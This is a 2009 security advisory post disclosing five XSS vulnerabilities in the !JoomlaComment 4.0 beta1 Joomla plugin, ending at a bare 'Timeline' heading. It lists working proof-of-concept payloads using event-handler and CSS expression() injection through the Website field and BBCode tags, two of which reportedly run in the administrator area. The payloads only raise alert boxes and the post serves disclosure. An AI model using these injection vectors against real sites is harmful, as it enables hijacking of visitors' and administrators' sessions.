jeffchannell.com

!JoomlaComment 4.0 beta1 Multiple XSS Vulnerabilities

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

!JoomlaComment 4.0 beta1, a commenting plugin, suffers from multiple XSS vulnerabilities.

  1. Website Input XSS

    The 'Website' input field is checked for html markup, but fails to sanitize extra parameters.
    ' onmouseover='alert(String.fromCharCode(88,83,83))
    ' style='color:expression(alert(String.fromCharCode(88,83,83)))
  2. [img] BBCode Tag XSS

    [img]http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))[/img]
  3. [url] BBCode Tag XSS

    [url=http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))]XSS[/url]
  4. [size] BBCode Tag XSS

    [size=large;color:expression(alert(String.fromCharCode(88,83,83)))]XSS[/size]
    This XSS vulnerability executes in the administrator area as well.
  5. [color] BBCode Tag XSS

    [color=red;font-size:expression(alert(String.fromCharCode(88,83,83)))]XSS[/color]
    This XSS vulnerability executes in the administrator area as well.

Timeline